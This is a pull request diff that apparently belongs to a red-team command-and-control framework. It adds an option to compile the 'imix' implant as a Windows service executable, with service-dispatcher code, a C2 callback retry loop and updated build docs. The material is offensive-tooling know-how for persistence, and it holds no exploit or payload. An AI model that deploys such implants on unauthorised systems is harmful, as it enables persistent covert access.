### PR TITLE
Adds support to be compiled as a windows service.

### DIFF
--- a/docs/_docs/user-guide/imix.md
+++ b/docs/_docs/user-guide/imix.md
@@ -83,6 +83,8 @@ RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --lib --target=x
 cd realm/implants/imix/
 # Build imix.exe
 RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target=x86_64-pc-windows-gnu
+# Build imix.svc.exe
+RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --features win_service --target=x86_64-pc-windows-gnu
 # Build imix.dll
 RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --lib --target=x86_64-pc-windows-gnu
 ```

--- a/implants/Cargo.toml
+++ b/implants/Cargo.toml
@@ -74,8 +74,10 @@ trait-variant = "0.1.1"
 uuid = "1.5.0"
 which = "4.4.2"
 whoami = "1.3.0"
+windows-service = "0.6.0"
 windows-sys = "0.45.0"
 winreg = "0.51.0"
+
 
 [profile.release]
 strip = true      # Automatically strip symbols from the binary.

--- a/implants/imix/Cargo.toml
+++ b/implants/imix/Cargo.toml
@@ -27,6 +27,9 @@ tokio = { workspace = true, features = ["full"] }
 uuid = { workspace = true, features = ["v4","fast-rng"] }
 whoami = { workspace = true }
 
+[target.'cfg(target_os = "linux")'.dependencies]
+windows-service = "0.6.0"
+
 [dev-dependencies]
 httptest = { workspace = true }
 tempfile = { workspace = true }

--- a/implants/imix/Cargo.toml
+++ b/implants/imix/Cargo.toml
@@ -3,12 +3,18 @@ name = "imix"
 version = "0.0.5"
 edition = "2021"
 
+[features]
+# Check if compiled by imix
+win_service = []
+default = []
+
 [dependencies]
 eldritch = { workspace = true, features = ["imix"] }
 pb = {workspace = true }
 transport = { workspace = true }
 
 anyhow = { workspace = true }
+env_logger = "0.11.2"
 chrono = { workspace = true , features = ["serde"] }
 clap = { workspace = true }
 default-net = { workspace = true }
@@ -27,7 +33,7 @@ tokio = { workspace = true, features = ["full"] }
 uuid = { workspace = true, features = ["v4","fast-rng"] }
 whoami = { workspace = true }
 
-[target.'cfg(target_os = "linux")'.dependencies]
+[target.'cfg(target_os = "windows")'.dependencies]
 windows-service = "0.6.0"
 
 [dev-dependencies]

--- a/implants/imix/src/install.rs
+++ b/implants/imix/src/install.rs
@@ -1,7 +1,7 @@
 use anyhow::{anyhow, Result};
 use eldritch::runtime::Message;
 use pb::eldritch::Tome;
-use std::{collections::HashMap, fmt::Write};
+use std::collections::HashMap;
 
 pub async fn install() {
     #[cfg(debug_assertions)]

--- a/implants/imix/src/install.rs
+++ b/implants/imix/src/install.rs
@@ -1,7 +1,7 @@
 use anyhow::{anyhow, Result};
 use eldritch::runtime::Message;
 use pb::eldritch::Tome;
-use std::collections::HashMap;
+use std::{collections::HashMap, fmt::Write};
 
 pub async fn install() {
     #[cfg(debug_assertions)]

--- a/implants/imix/src/lib.rs
+++ b/implants/imix/src/lib.rs
@@ -11,8 +11,6 @@ pub use agent::Agent;
 use clap::Command;
 pub use config::Config;
 pub use install::install;
-use windows_service::service_dispatcher;
-use anyhow::Result;
 
 
 pub async fn handle_main(){

--- a/implants/imix/src/lib.rs
+++ b/implants/imix/src/lib.rs
@@ -3,7 +3,59 @@ mod config;
 mod install;
 mod task;
 mod version;
+pub mod win_service;
+
+use std::time::Duration;
 
 pub use agent::Agent;
+use clap::Command;
 pub use config::Config;
 pub use install::install;
+use windows_service::service_dispatcher;
+use anyhow::Result;
+
+
+pub async fn handle_main(){
+    #[cfg(debug_assertions)]
+    init_logging();
+
+    if let Some(("install", _)) = Command::new("imix")
+        .subcommand(Command::new("install").about("Install imix"))
+        .get_matches()
+        .subcommand()
+    {
+        install().await;
+        return;
+    }
+
+    loop {
+        let cfg = Config::default();
+        let retry_interval = cfg.retry_interval;
+        #[cfg(debug_assertions)]
+        log::info!("agent config initialized {:#?}", cfg.clone());
+
+        match run(cfg).await {
+            Ok(_) => {}
+            Err(_err) => {
+                #[cfg(debug_assertions)]
+                log::error!("callback loop fatal: {_err}");
+
+                tokio::time::sleep(Duration::from_secs(retry_interval)).await;
+            }
+        }
+    }
+}
+
+async fn run(cfg: Config) -> anyhow::Result<()> {
+    let mut agent = Agent::new(cfg)?;
+    agent.callback_loop().await?;
+    Ok(())
+}
+
+#[cfg(debug_assertions)]
+fn init_logging() {
+    pretty_env_logger::formatted_timed_builder()
+        .filter_level(log::LevelFilter::Info)
+        .parse_env("IMIX_LOG")
+        .init();
+}

--- a/implants/imix/src/lib.rs
+++ b/implants/imix/src/lib.rs
@@ -3,6 +3,7 @@ mod config;
 mod install;
 mod task;
 mod version;
+#[cfg(feature = "win_service")]
 pub mod win_service;
 
 use std::time::Duration;

--- a/implants/imix/src/main.rs
+++ b/implants/imix/src/main.rs
@@ -3,10 +3,20 @@
 #[macro_use]
 extern crate windows_service;
 
-use imix::{handle_main,win_service::handle_service_main};
+use imix::handle_main;
 
-#[cfg(feature = "win_service")]
-use windows_service::service_dispatcher;
+
+// ============= Standard ===============
+
+#[cfg(not(feature = "win_service"))]
+#[tokio::main(flavor = "multi_thread", worker_threads = 128)]
+async fn main() {
+
+    handle_main().await
+}
+
+
+// ============ Windows Service =============
 
 #[cfg(all(feature = "win_service", not(target_os = "windows")))]
 compile_error!("Feature win_service is only available on windows targets");
@@ -14,17 +24,18 @@ compile_error!("Feature win_service is only available on windows targets");
 #[cfg(feature = "win_service")]
 define_windows_service!(ffi_service_main, service_main);
 
-#[tokio::main(flavor = "multi_thread", worker_threads = 128)]
-async fn main() {
-    #[cfg(feature = "win_service")]
+#[cfg(feature = "win_service")]
+fn main() {
+    use windows_service::service_dispatcher;
     service_dispatcher::start("imix", ffi_service_main).unwrap();
-    handle_main().await
 }
 
 #[cfg(feature = "win_service")]
 #[tokio::main(flavor = "multi_thread", worker_threads = 128)]
 async fn service_main(arguments: Vec<std::ffi::OsString>) {
-    imix::win_service::handle_service_main(arguments);
+    use imix::win_service::handle_service_main;
+
+    handle_service_main(arguments);
 
     handle_main().await;
 }

--- a/implants/imix/src/main.rs
+++ b/implants/imix/src/main.rs
@@ -17,7 +17,7 @@ define_windows_service!(ffi_service_main, service_main);
 #[tokio::main(flavor = "multi_thread", worker_threads = 128)]
 async fn main() {
     #[cfg(feature = "win_service")]
-    service_dispatcher::start("svc-debug", ffi_service_main).unwrap();
+    service_dispatcher::start("imix", ffi_service_main).unwrap();
     handle_main().await
 }
 
@@ -25,14 +25,6 @@ async fn main() {
 #[tokio::main(flavor = "multi_thread", worker_threads = 128)]
 async fn service_main(arguments: Vec<std::ffi::OsString>) {
     imix::win_service::handle_service_main(arguments);
-
-    match service_dispatcher::start("imix", ffi_service_main) {
-        Ok(_) => {},
-        Err(_err) => {
-            #[cfg(debug_assertions)]
-            log::info!("Failed to start service {}", _err);    
-        },
-    }
 
     handle_main().await;
 }

--- a/implants/imix/src/win_service.rs
+++ b/implants/imix/src/win_service.rs
@@ -1,0 +1,39 @@
+use std::{ffi::OsString, fs::File, io::Write, thread, time::{self, Duration}};
+use windows_service::{service::{ServiceControl, ServiceControlAccept, ServiceExitCode, ServiceState, ServiceStatus, ServiceType}, service_control_handler::{self, ServiceControlHandlerResult}, service_dispatcher};
+
+
+pub fn handle_service_main(arguments: Vec<OsString>) {
+    let event_handler = move |control_event| -> ServiceControlHandlerResult {
+        match control_event {
+            ServiceControl::Stop => {
+                // Handle stop event and return control back to the system.
+                ServiceControlHandlerResult::NoError
+            }
+            // All services must accept Interrogate even if it's a no-op.
+            ServiceControl::Interrogate => ServiceControlHandlerResult::NoError,
+            _ => ServiceControlHandlerResult::NotImplemented,
+        }
+    };
+
+    // Register system service event handler
+    let status_handle = service_control_handler::register("myservice", event_handler).unwrap();
+
+    let next_status = ServiceStatus {
+        // Should match the one from system service registry
+        service_type: ServiceType::OWN_PROCESS,
+        // The new state
+        current_state: ServiceState::Running,
+        // Accept stop events when running
+        controls_accepted: ServiceControlAccept::STOP,
+        // Used to report an error when starting or stopping only, otherwise must be zero
+        exit_code: ServiceExitCode::Win32(0),
+        // Only used for pending states, otherwise must be zero
+        checkpoint: 0,
+        // Only used for pending states, otherwise must be zero
+        wait_hint: Duration::default(),
+        process_id: Some(18882),
+    };
+
+    // Tell the system that the service is running now
+    status_handle.set_service_status(next_status).unwrap();
+}

--- a/implants/imix/src/win_service.rs
+++ b/implants/imix/src/win_service.rs
@@ -1,8 +1,13 @@
-use std::{ffi::OsString, fs::File, io::Write, thread, time::{self, Duration}};
-use windows_service::{service::{ServiceControl, ServiceControlAccept, ServiceExitCode, ServiceState, ServiceStatus, ServiceType}, service_control_handler::{self, ServiceControlHandlerResult}, service_dispatcher};
+use std::{ffi::OsString, time::Duration};
+use windows_service::{
+    service::{
+        ServiceControl, ServiceControlAccept, ServiceExitCode, ServiceState, ServiceStatus,
+        ServiceType,
+    },
+    service_control_handler::{self, ServiceControlHandlerResult},
+};
 
-
-pub fn handle_service_main(arguments: Vec<OsString>) {
+pub fn handle_service_main(_arguments: Vec<OsString>) {
     let event_handler = move |control_event| -> ServiceControlHandlerResult {
         match control_event {
             ServiceControl::Stop => {

--- a/implants/imix/src/win_service.rs
+++ b/implants/imix/src/win_service.rs
@@ -36,7 +36,8 @@ pub fn handle_service_main(_arguments: Vec<OsString>) {
         checkpoint: 0,
         // Only used for pending states, otherwise must be zero
         wait_hint: Duration::default(),
-        process_id: Some(18882),
+        // Process ID of the service This is only retrieved when querying the service status
+        process_id: None,
     };
 
     // Tell the system that the service is running now

--- a/implants/lib/transport/src/grpc.rs
+++ b/implants/lib/transport/src/grpc.rs
@@ -6,7 +6,6 @@ use tonic::codec::ProstCodec;
 use tonic::GrpcMethod;
 use tonic::Request;
 
-#[cfg(debug_assertions)]
 use std::time::Duration;
 
 static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks";


### PR DESCRIPTION
#### What type of PR is this?
/kind feature

#### What this PR does / why we need it:
Allows imix to compile to a windows service exe.
- [X] Tested locally: Service starts successfully
- [X] Made sure it called back
- [X] Add docs to compile for windows service

#### Which issue(s) this PR fixes:
Fixes #375 
